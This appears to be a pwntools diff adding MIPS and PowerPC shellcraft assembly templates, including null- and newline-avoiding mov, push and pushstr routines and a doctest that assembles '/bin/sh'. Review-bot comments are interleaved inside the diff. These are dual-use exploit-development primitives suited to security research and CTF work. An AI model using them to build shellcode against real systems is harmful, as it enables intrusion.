@@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="timerid, flags, value, ovalue"/> +<%docstring> +Invokes the syscall timer_settime. See 'man 2 timer_settime' for more information. + +Arguments: + timerid(timer_t): timerid + flags(int): flags + value(itimerspec): value + ovalue(itimerspec): ovalue + + + ${syscall('SYS_timer_settime', timerid, flags, value, ovalue)} diff --git a/pwnlib/shellcraft/templates/mips/linux/truncate.asm b/pwnlib/shellcraft/templates/mips/linux/truncate.asm new file mode 100644 index 000000000..c03b8851e --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/truncate.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="file, length"/> +<%docstring> +Invokes the syscall truncate. See 'man 2 truncate' for more information. + +Arguments: + file(char): file + length(off_t): length + + + ${syscall('SYS_truncate', file, length)} diff --git a/pwnlib/shellcraft/templates/mips/linux/truncate64.asm b/pwnlib/shellcraft/templates/mips/linux/truncate64.asm new file mode 100644 index 000000000..1e488e9d8 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/truncate64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="file, length"/> +<%docstring> +Invokes the syscall truncate64. See 'man 2 truncate64' for more information. + +Arguments: + file(char): file + length(off64_t): length + + + ${syscall('SYS_truncate64', file, length)} diff --git a/pwnlib/shellcraft/templates/mips/linux/ulimit.asm b/pwnlib/shellcraft/templates/mips/linux/ulimit.asm new file mode 100644 index 000000000..b464e9210 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/ulimit.asm 
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="cmd, vararg"/> +<%docstring> +Invokes the syscall ulimit. See 'man 2 ulimit' for more information. + +Arguments: + cmd(int): cmd + vararg(int): vararg + + + ${syscall('SYS_ulimit', cmd, vararg)} diff --git a/pwnlib/shellcraft/templates/mips/linux/umask.asm b/pwnlib/shellcraft/templates/mips/linux/umask.asm new file mode 100644 index 000000000..3670efd3d --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/umask.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="mask"/> +<%docstring> +Invokes the syscall umask. See 'man 2 umask' for more information. + +Arguments: + mask(mode_t): mask + + + ${syscall('SYS_umask', mask)} diff --git a/pwnlib/shellcraft/templates/mips/linux/uname.asm b/pwnlib/shellcraft/templates/mips/linux/uname.asm new file mode 100644 index 000000000..242f29df4 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/uname.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall uname. See 'man 2 uname' for more information. + +Arguments: + name(utsname): name + + + ${syscall('SYS_uname', name)} diff --git a/pwnlib/shellcraft/templates/mips/linux/unlink.asm b/pwnlib/shellcraft/templates/mips/linux/unlink.asm new file mode 100644 index 000000000..983b17c52 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/unlink.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall unlink. See 'man 2 unlink' for more information. + +Arguments: + name(char): name + + + ${syscall('SYS_unlink', name)} diff --git a/pwnlib/shellcraft/templates/mips/linux/unlinkat.asm b/pwnlib/shellcraft/templates/mips/linux/unlinkat.asm new file mode 100644 index 000000000..1b996d32d --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/unlinkat.asm 
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, name, flag"/> +<%docstring> +Invokes the syscall unlinkat. See 'man 2 unlinkat' for more information. + +Arguments: + fd(int): fd + name(char): name + flag(int): flag + + + ${syscall('SYS_unlinkat', fd, name, flag)} diff --git a/pwnlib/shellcraft/templates/mips/linux/unshare.asm b/pwnlib/shellcraft/templates/mips/linux/unshare.asm new file mode 100644 index 000000000..48f527e25 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/unshare.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="flags"/> +<%docstring> +Invokes the syscall unshare. See 'man 2 unshare' for more information. + +Arguments: + flags(int): flags + + + ${syscall('SYS_unshare', flags)} diff --git a/pwnlib/shellcraft/templates/mips/linux/ustat.asm b/pwnlib/shellcraft/templates/mips/linux/ustat.asm new file mode 100644 index 000000000..2ab2ec87d --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/ustat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="dev, ubuf"/> +<%docstring> +Invokes the syscall ustat. See 'man 2 ustat' for more information. + +Arguments: + dev(dev_t): dev + ubuf(ustat): ubuf + + + ${syscall('SYS_ustat', dev, ubuf)} diff --git a/pwnlib/shellcraft/templates/mips/linux/utime.asm b/pwnlib/shellcraft/templates/mips/linux/utime.asm new file mode 100644 index 000000000..ea8da3981 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/utime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="file, file_times"/> +<%docstring> +Invokes the syscall utime. See 'man 2 utime' for more information. + +Arguments: + file(char): file + file_times(utimbuf): file_times + + + ${syscall('SYS_utime', file, file_times)} 
diff --git a/pwnlib/shellcraft/templates/mips/linux/utimensat.asm b/pwnlib/shellcraft/templates/mips/linux/utimensat.asm new file mode 100644 index 000000000..cc2918985 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/utimensat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, path, times, flags"/> +<%docstring> +Invokes the syscall utimensat. See 'man 2 utimensat' for more information. + +Arguments: + fd(int): fd + path(char): path + times(timespec): times + flags(int): flags + + + ${syscall('SYS_utimensat', fd, path, times, flags)} diff --git a/pwnlib/shellcraft/templates/mips/linux/utimes.asm b/pwnlib/shellcraft/templates/mips/linux/utimes.asm new file mode 100644 index 000000000..a7c841d6f --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/utimes.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="file, tvp"/> +<%docstring> +Invokes the syscall utimes. See 'man 2 utimes' for more information. + +Arguments: + file(char): file + tvp(timeval): tvp + + + ${syscall('SYS_utimes', file, tvp)} diff --git a/pwnlib/shellcraft/templates/mips/linux/vfork.asm b/pwnlib/shellcraft/templates/mips/linux/vfork.asm new file mode 100644 index 000000000..c05e5a510 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/vfork.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall vfork. See 'man 2 vfork' for more information. + +Arguments: + + + + ${syscall('SYS_vfork')} diff --git a/pwnlib/shellcraft/templates/mips/linux/vhangup.asm b/pwnlib/shellcraft/templates/mips/linux/vhangup.asm new file mode 100644 index 000000000..49bf1992b --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/vhangup.asm 
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall vhangup. See 'man 2 vhangup' for more information. + +Arguments: + + + + ${syscall('SYS_vhangup')} diff --git a/pwnlib/shellcraft/templates/mips/linux/vmsplice.asm b/pwnlib/shellcraft/templates/mips/linux/vmsplice.asm new file mode 100644 index 000000000..e9cc77196 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/vmsplice.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fdout, iov, count, flags"/> +<%docstring> +Invokes the syscall vmsplice. See 'man 2 vmsplice' for more information. + +Arguments: + fdout(int): fdout + iov(iovec): iov + count(size_t): count + flags(unsigned): flags + + + ${syscall('SYS_vmsplice', fdout, iov, count, flags)} diff --git a/pwnlib/shellcraft/templates/mips/linux/wait4.asm b/pwnlib/shellcraft/templates/mips/linux/wait4.asm new file mode 100644 index 000000000..b2d356411 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/wait4.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="pid, stat_loc, options, usage"/> +<%docstring> +Invokes the syscall wait4. See 'man 2 wait4' for more information. + +Arguments: + pid(pid_t): pid + stat_loc(WAIT_STATUS): stat_loc + options(int): options + usage(rusage): usage + + + ${syscall('SYS_wait4', pid, stat_loc, options, usage)} diff --git a/pwnlib/shellcraft/templates/mips/linux/waitid.asm b/pwnlib/shellcraft/templates/mips/linux/waitid.asm new file mode 100644 index 000000000..d2acbf358 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/waitid.asm 
@@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="idtype, id, infop, options"/> +<%docstring> +Invokes the syscall waitid. See 'man 2 waitid' for more information. + +Arguments: + idtype(idtype_t): idtype + id(id_t): id + infop(siginfo_t): infop + options(int): options + + + ${syscall('SYS_waitid', idtype, id, infop, options)} diff --git a/pwnlib/shellcraft/templates/mips/linux/waitpid.asm b/pwnlib/shellcraft/templates/mips/linux/waitpid.asm new file mode 100644 index 000000000..369824d6e --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/waitpid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="pid, stat_loc, options"/> +<%docstring> +Invokes the syscall waitpid. See 'man 2 waitpid' for more information. + +Arguments: + pid(pid_t): pid + stat_loc(int): stat_loc + options(int): options + + + ${syscall('SYS_waitpid', pid, stat_loc, options)} diff --git a/pwnlib/shellcraft/templates/mips/linux/write.asm b/pwnlib/shellcraft/templates/mips/linux/write.asm new file mode 100644 index 000000000..189f8aaa8 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/write.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, buf, n"/> +<%docstring> +Invokes the syscall write. See 'man 2 write' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + + + ${syscall('SYS_write', fd, buf, n)} diff --git a/pwnlib/shellcraft/templates/mips/linux/writev.asm b/pwnlib/shellcraft/templates/mips/linux/writev.asm new file mode 100644 index 000000000..cef625d72 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/writev.asm 
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, iovec, count"/> +<%docstring> +Invokes the syscall writev. See 'man 2 writev' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + + + ${syscall('SYS_writev', fd, iovec, count)} diff --git a/pwnlib/shellcraft/templates/mips/mov.asm b/pwnlib/shellcraft/templates/mips/mov.asm index ad8c9d0bc..b8208be88 100644 --- a/pwnlib/shellcraft/templates/mips/mov.asm +++ b/pwnlib/shellcraft/templates/mips/mov.asm 
@@ -1,50 +1,137 @@ <% - from pwnlib.shellcraft import common - from pwnlib import constants + from pwnlib.util import lists, packing, fiddling, misc + from pwnlib.constants import eval, Constant from pwnlib.context import context as ctx # Ugly hack, mako will not let it be called context from pwnlib.log import getLogger - from pwnlib.shellcraft.registers import mips as regs - from pwnlib.util.fiddling import negate, bnot - log = getLogger('pwnlib.shellcraft.arm.mov') + from pwnlib.shellcraft import mips, registers, pretty, okay + log = getLogger('pwnlib.shellcraft.mips.mov') %> <%page args="dst, src"/> <%docstring> -Move src into dest. +Move src into dst without newlines and null bytes. -Support for automatically avoiding newline and null bytes has to be done. +Register $t8 and $t9 are not guarenteed to be preserved. If src is a string that is not a register, then it will locally set `context.arch` to `'mips'` and use :func:`pwnlib.constants.eval` to evaluate the string. Note that this means that this shellcode can change behavior depending on the value of `context.os`. -Examples: - - >>> print shellcraft.mips.mov('a0','a1').rstrip() - move $a0, $a1 - >>> print shellcraft.mips.mov('a0', 5).rstrip() - /* Set r0 = 5 = 0x5 */ - li $a0, 5 - Args: - dest (str): The destination register. + + dst (str): The destination register. src (str): Either the input register, or an immediate value. 
+ +Example: + + >>> print shellcraft.mips.mov('$t0', 0).rstrip() + slti $t0, $zero, 0xFFFF /* $t0 = 0 */ + >>> print shellcraft.mips.mov('$t2', 0).rstrip() + xor $t2, $t2, $t2 /* $t2 = 0 */ + >>> print shellcraft.mips.mov('$t0', 0xcafebabe).rstrip() + li $t0, 0xcafebabe + >>> print shellcraft.mips.mov('$t2', 0xcafebabe).rstrip() + li $t9, 0xcafebabe + add $t2, $t9, $zero + >>> print shellcraft.mips.mov('$s0', 0xca0000be).rstrip() + li $t9, ~0xca0000be + not $s0, $t9 + >>> print shellcraft.mips.mov('$s0', 0xca0000ff).rstrip() + li $t9, 0x1010101 ^ 0xca0000ff + li $s0, 0x1010101 + xor $s0, $t9, $s0 + >>> print shellcraft.mips.mov('$t9', 0xca0000be).rstrip() + li $t9, ~0xca0000be + not $t9, $t9 + >>> print shellcraft.mips.mov('$t2', 0xca0000be).rstrip() + li $t9, ~0xca0000be + not $t9, $t9 + add $t2, $t9, $0 /* mov $t2, $t9 */ + >>> print shellcraft.mips.mov('$t2', 0xca0000ff).rstrip() + li $t8, 0x1010101 ^ 0xca0000ff + li $t9, 0x1010101 + xor $t9, $t8, $t9 + add $t2, $t9, $0 /* mov $t2, $t9 */ + >>> print shellcraft.mips.mov('$a0', '$t2').rstrip() + add $a0, $t2, $0 /* mov $a0, $t2 */ + >>> print shellcraft.mips.mov('$a0', '$t8').rstrip() + sw $t8, -4($sp) /* mov $a0, $t8 */ + lw $a0, -4($sp) + <% -if not dst in regs: - log.error('%r is not a register' % str(dst)) +if isinstance(src, str) and src.startswith('$') and src not in registers.mips: + log.error("Unknown register %r" % src) + return + +if not dst.startswith('$'): + log.error("Registers must start with $") + return -if not src in regs: - with ctx.local(arch = 'mips'): - src = constants.eval(src) +if isinstance(src, str) and dst.startswith('$') and dst not in registers.mips: + log.error("Unknown register %r" % dst) + return + +if isinstance(src, str) and src not in registers.mips: + src = eval(src) + +src_reg = registers.mips.get(src, None) +dst_reg = registers.mips.get(dst, None) +tmp_reg = '$t9' if dst_reg != registers.mips['$t9'] else '$t8' + +if src_reg == 0: + src = 0 + src_reg = None +%>\ +% if None not 
in (src_reg, dst_reg): + % if src_reg == dst_reg: +## Nop. + /* mov ${dst}, ${src} is a noop */ + % elif src_reg not in [2, 3, 4, 5, 6, 7, 8, 16, 24]: +## Avoid using a src in the list because it causes NULL byte + add ${dst}, ${src}, $0 /* mov ${dst}, ${src} */ + % else: +## Better than two 'li' instructions due to being two instructions +## fewer. 'li' is actually 'lui' and 'ori' in hiding. + sw ${src}, -4($sp) /* mov ${dst}, ${src} */ + lw ${dst}, -4($sp) + % endif +% elif dst_reg == 10: +## Register $t2/$10 may encodes a newline for 'lui $t2, XXXX' +## so we have to send everything through $t9. + %if okay(src): + li $t9, ${pretty(src)} + add ${dst}, $t9, $zero + % elif src in (0, '$zero', '$0'): + xor ${dst}, ${dst}, ${dst} /* ${dst} = 0 */ + % elif dst == '$t2': + ${mips.mov('$t9', src)} + ${mips.mov(dst, '$t9')} + %endif +% elif isinstance(src, (int, long)): +## Everything else is the general case for moving into registers. +<% + srcp = packing.pack(src, word_size=32) + srcu = packing.unpack(srcp, word_size=32, sign=False) +%> +% if src in (0, '$zero', '$0'): +## XOR sometimes encodes a zero byte, so use SLTI instead + slti ${dst}, $zero, 0xFFFF /* ${dst} = 0 */ +% elif okay(src): +## Nice and easy + li ${dst}, ${pretty(src)} +% elif okay((~srcu) & 0xffffffff): +## Almost nice and easy + li $t9, ~${pretty(src)} + not ${dst}, $t9 +% else: +<% +a,b = fiddling.xor_pair(srcp, avoid = '\x00\n') +a = hex(packing.unpack(a, 32)) +b = hex(packing.unpack(b, 32)) %> -%if not isinstance(src, (int, long)): - move $${dst}, $${src} -%else: - /* Set ${dst} = ${src} = 0x${'%x' % src} */ - %if src == 0: - xor $${dst}, $${dst}, $${dst} - %else: - li $${dst}, ${src} - %endif -%endif + li ${tmp_reg}, ${a} ^ ${pretty(src)} + li ${dst}, ${a} + xor ${dst}, ${tmp_reg}, ${dst} +% endif +% endif diff --git a/pwnlib/shellcraft/templates/mips/nop.asm b/pwnlib/shellcraft/templates/mips/nop.asm new file mode 100644 index 000000000..84c434725 --- /dev/null 
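Review bot: In the `% elif dst_reg == 10:` branch the last alternative is `% elif dst == '$t2':`, so a caller that spells the same register `'$10'` with a non-zero source that fails `okay()` falls through every branch and the template emits nothing — a silent missing mov; since `dst_reg == 10` already covers both spellings, `% else:` is the right condition there. The outer `% elif isinstance(src, (int, long)):` also has no `% else:`, so if `eval(src)` can yield something that is not an int subclass the same silent no-output occurs; a trailing `% else:` with `log.error("Cannot mov %r into %s" % (src, dst))` would catch both. The `sw ${src}, -4($sp)` / `lw ${dst}, -4($sp)` pair uses a scratch slot below `$sp`; a mako comment such as `## scratch slot below $sp: clobbered by any signal delivered in between` would tell callers what they are relying on. The docstring spelling `guarenteed` should be `guaranteed`.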
+++ b/pwnlib/shellcraft/templates/mips/nop.asm
@@ -0,0 +1,2 @@
+<%docstring>MIPS nop instruction.
+ add $t9, $t9, $zero /* nop */
diff --git a/pwnlib/shellcraft/templates/mips/push.asm b/pwnlib/shellcraft/templates/mips/push.asm
new file mode 100644
index 000000000..b56c65450
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/push.asm
@@ -0,0 +1,27 @@
+<%
+ from pwnlib.util import packing
+ from pwnlib.shellcraft import mips
+ from pwnlib import constants
+ from pwnlib.shellcraft import registers
+ import re
+%>
+<%page args="value"/>
+<%docstring>
+Pushes a value onto the stack.
+
+<%
+value_orig = value
+is_reg = value in registers.mips
+
+if not is_reg and isinstance(value, (str, unicode)):
+ try:
+ value = constants.eval(value)
+ except (ValueError, AttributeError):
+ pass
+%>
+% if not is_reg:
+ ${mips.mov('$t0', value)}
+ <% value = '$t0' %>\
+%endif
+ sw ${value}, -4($sp)
+ addi $sp, $sp, -4
diff --git a/pwnlib/shellcraft/templates/mips/pushstr.asm b/pwnlib/shellcraft/templates/mips/pushstr.asm
new file mode 100644
index 000000000..485b1c3ac
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/pushstr.asm
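Review bot: `value_orig = value` and `import re` in push.asm are never used and should be removed. The epilogue is `addi $sp, $sp, -4` while pushstr.asm in the same series uses `addiu`; `addi` traps on signed overflow, so the unsigned form is the conventional choice for stack arithmetic and keeps the two templates consistent: `addiu $sp, $sp, -4`. The docstring has no Args section and does not say that `$t0` (and whatever `mips.mov` uses internally) is clobbered when `value` is not a register; suggest `Args: value (int,str): Register name, or an immediate/constant expression to push. Clobbers $t0 for non-register values.`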
@@ -0,0 +1,111 @@
+<%
+ from pwnlib.util import lists, packing, fiddling
+ from pwnlib.shellcraft import mips
+%>\
+<%page args="string, append_null = True"/>
+<%docstring>
+Pushes a string onto the stack without using
+null bytes or newline characters.
+
+Example:
+
+ >>> print shellcraft.mips.pushstr('').rstrip()
+ /* push '\x00' */
+ sw $zero, -4($sp)
+ addiu $sp, $sp, -4
+ >>> print shellcraft.mips.pushstr('a').rstrip()
+ /* push 'a\x00' */
+ li $t9, ~0x61
+ not $t1, $t9
+ sw $t1, -4($sp)
+ addiu $sp, $sp, -4
+ >>> print shellcraft.mips.pushstr('aa').rstrip()
+ /* push 'aa\x00' */
+ li $t9, ~0x6161
+ not $t1, $t9
+ sw $t1, -4($sp)
+ addiu $sp, $sp, -4
+ >>> print shellcraft.mips.pushstr('aaa').rstrip()
+ /* push 'aaa\x00' */
+ li $t9, ~0x616161
+ not $t1, $t9
+ sw $t1, -4($sp)
+ addiu $sp, $sp, -4
+ >>> print shellcraft.mips.pushstr('aaaa').rstrip()
+ /* push 'aaaa\x00' */
+ li $t1, 0x61616161
+ sw $t1, -8($sp)
+ sw $zero, -4($sp)
+ addiu $sp, $sp, -8
+ >>> print shellcraft.mips.pushstr('aaaaa').rstrip()
+ /* push 'aaaaa\x00' */
+ li $t1, 0x61616161
+ sw $t1, -8($sp)
+ li $t9, ~0x61
+ not $t1, $t9
+ sw $t1, -4($sp)
+ addiu $sp, $sp, -8
+ >>> print shellcraft.mips.pushstr('aaaa', append_null = False).rstrip()
+ /* push 'aaaa' */
+ li $t1, 0x61616161
+ sw $t1, -4($sp)
+ addiu $sp, $sp, -4
+ >>> print shellcraft.mips.pushstr('\xc3').rstrip()
+ /* push '\xc3\x00' */
+ li $t9, ~0xc3
+ not $t1, $t9
+ sw $t1, -4($sp)
+ addiu $sp, $sp, -4
+ >>> print shellcraft.mips.pushstr('\xc3', append_null = False).rstrip()
+ /* push '\xc3' */
+ li $t9, ~0xc3
+ not $t1, $t9
+ sw $t1, -4($sp)
+ addiu $sp, $sp, -4
+ >>> print enhex(asm(shellcraft.mips.pushstr("/bin/sh")))
+ 696e093c2f622935f8ffa9af97ff193cd08c393727482003fcffa9aff8ffbd27
+ >>> print enhex(asm(shellcraft.mips.pushstr("")))
+ fcffa0affcffbd27
+ >>> print enhex(asm(shellcraft.mips.pushstr("\x00", False)))
+ fcffa0affcffbd27
+
+Args:
+ string (str): The string to push.
+ append_null (bool): Whether to append a single NULL-byte before pushing.
+
+<%
+ if append_null:
+ string += '\x00'
+ if not string:
+ return
+
+ def get_offset(nib):
+ num = 0
+ # Ensure we don't overflow our existing nibble
+ if nib[0] == '\xff':
+ num = 3
+ else:
+ num = 0x101
+ return num
+
+ def pretty(n):
+ return hex(n & (2 ** 32 - 1))
+
+ split_string = lists.group(4, string, 'fill', '\x00')
+ stack_offset = len(split_string) * -4
+%>\
+ /* push ${repr(string)} */
+% for index, word in enumerate(split_string):
+% if word == '\x00\x00\x00\x00':
+ sw $zero, ${stack_offset+(4 * index)}($sp)
+<%
+ continue
+%>\
+% endif
+<%
+ word = packing.u32(word, sign=True)
+%>\
+ ${mips.mov('$t1', word)}
+ sw $t1, ${stack_offset+(4 * index)}($sp)
+% endfor
+ addiu $sp, $sp, ${stack_offset}
diff --git a/pwnlib/shellcraft/templates/mips/setregs.asm b/pwnlib/shellcraft/templates/mips/setregs.asm
new file mode 100644
index 000000000..057f7c881
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/setregs.asm
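Review bot: `get_offset` and `pretty` in the pushstr.asm preamble are defined but never called, and the local `pretty` shadows the `pwnlib.shellcraft.pretty` helper that the sibling mov.asm imports, so both should be dropped before they confuse the next reader. The `'\x00\x00\x00\x00'` fast path and the per-word `mips.mov('$t1', word)` route match the doctests, but every iteration clobbers `$t1` and, through `mips.mov`, `$t9`/`$t8`; the docstring should state that: `Clobbers $t1, and $t8/$t9 via mips.mov.` This hunk starts on the previous line.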
@@ -0,0 +1,45 @@
+<%
+ from pwnlib.regsort import regsort
+ from pwnlib.constants import Constant, eval
+ from pwnlib.shellcraft import registers
+ from pwnlib.shellcraft.mips import mov
+%>
+<%page args="reg_context, stack_allowed = True"/>
+<%docstring>
+Sets multiple registers, taking any register dependencies into account
+(i.e., given eax=1,ebx=eax, set ebx first).
+
+Args:
+ reg_context (dict): Desired register context
+ stack_allowed (bool): Can the stack be used?
+
+Example:
+
+ >>> print shellcraft.setregs({'$t0':1, '$a3':'0'}).rstrip()
+ slti $a3, $zero, 0xFFFF /* $a3 = 0 */
+ li $t9, ~1
+ not $t0, $t9
+ >>> print shellcraft.setregs({'$a0':'$a1', '$a1':'$a0', '$a2':'$a1'}).rstrip()
+ sw $a1, -4($sp) /* mov $a2, $a1 */
+ lw $a2, -4($sp)
+ xor $a1, $a1, $a0 /* xchg $a1, $a0 */
+ xor $a0, $a1, $a0
+ xor $a1, $a1, $a0
+
+<%
+reg_context = {k:v for k,v in reg_context.items() if v is not None}
+sorted_regs = regsort(reg_context, registers.mips)
+%>
+% if not sorted_regs:
+ /* setregs noop */
+% else:
+% for how, src, dst in regsort(reg_context, registers.mips):
+% if how == 'xchg':
+ xor ${dst}, ${dst}, ${src} /* xchg ${dst}, ${src} */
+ xor ${src}, ${dst}, ${src}
+ xor ${dst}, ${dst}, ${src}
+% else:
+ ${mov(src, dst)}
+% endif
+% endfor
+% endif
diff --git a/pwnlib/shellcraft/templates/mips/trap.asm b/pwnlib/shellcraft/templates/mips/trap.asm
new file mode 100644
index 000000000..5656e9497
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/trap.asm
@@ -0,0 +1,2 @@
+<%docstring>A trap instruction.
+ teq $zero, $zero
diff --git a/pwnlib/shellcraft/templates/powerpc/__doc__ b/pwnlib/shellcraft/templates/powerpc/__doc__
new file mode 100644
index 000000000..e69de29bb
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/__doc__ b/pwnlib/shellcraft/templates/powerpc/linux/__doc__
new file mode 100644
index 000000000..e69de29bb
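Review bot: The `% for` loop in setregs.asm calls `regsort(reg_context, registers.mips)` a second time even though the result is already held in `sorted_regs`; iterate the stored list instead: `% for how, src, dst in sorted_regs:`. Judging from the doctest (`{'$a2':'$a1'}` yields `/* mov $a2, $a1 */`), the loop variable named `src` actually holds the destination, so `${mov(src, dst)}` is correct only because the names are swapped relative to `mov(dst, src)`; renaming them to `how, dst, src` and writing `${mov(dst, src)}` removes a trap for the next reader. `stack_allowed` is accepted and documented but never read, and `Constant`/`eval` are imported unused; either honour `stack_allowed` (the `mov` path can emit `sw`/`lw` through the stack) or say in its docstring line that it is currently ignored.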
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/accept.asm b/pwnlib/shellcraft/templates/powerpc/linux/accept.asm new file mode 100644 index 000000000..e8a80cdb0 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/accept.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, addr, addr_len"/> +<%docstring> +Invokes the syscall accept. See 'man 2 accept' for more information. + +Arguments: + fd(int): fd + addr(SOCKADDR_ARG): addr + addr_len(socklen_t): addr_len + + + ${syscall('SYS_accept', fd, addr, addr_len)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/access.asm b/pwnlib/shellcraft/templates/powerpc/linux/access.asm new file mode 100644 index 000000000..31015e3d5 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/access.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="name, type"/> +<%docstring> +Invokes the syscall access. See 'man 2 access' for more information. + +Arguments: + name(char): name + type(int): type + + + ${syscall('SYS_access', name, type)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/acct.asm b/pwnlib/shellcraft/templates/powerpc/linux/acct.asm new file mode 100644 index 000000000..9b5f60d66 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/acct.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall acct. See 'man 2 acct' for more information. + +Arguments: + name(char): name + + + ${syscall('SYS_acct', name)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/alarm.asm b/pwnlib/shellcraft/templates/powerpc/linux/alarm.asm new file mode 100644 index 000000000..ae81e236a --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/alarm.asm 
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="seconds"/> +<%docstring> +Invokes the syscall alarm. See 'man 2 alarm' for more information. + +Arguments: + seconds(unsigned): seconds + + + ${syscall('SYS_alarm', seconds)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/bind.asm b/pwnlib/shellcraft/templates/powerpc/linux/bind.asm new file mode 100644 index 000000000..3bd1b1c63 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/bind.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall bind. See 'man 2 bind' for more information. + +Arguments: + fd(int): fd + addr(CONST_SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_bind', fd, addr, len)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/brk.asm b/pwnlib/shellcraft/templates/powerpc/linux/brk.asm new file mode 100644 index 000000000..0bab8c9c6 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/brk.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="addr"/> +<%docstring> +Invokes the syscall brk. See 'man 2 brk' for more information. + +Arguments: + addr(void): addr + + + ${syscall('SYS_brk', addr)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/chdir.asm b/pwnlib/shellcraft/templates/powerpc/linux/chdir.asm new file mode 100644 index 000000000..f590392b8 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/chdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall chdir. See 'man 2 chdir' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_chdir', path)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/chmod.asm b/pwnlib/shellcraft/templates/powerpc/linux/chmod.asm new file mode 100644 index 000000000..bcc40cd61 --- /dev/null 
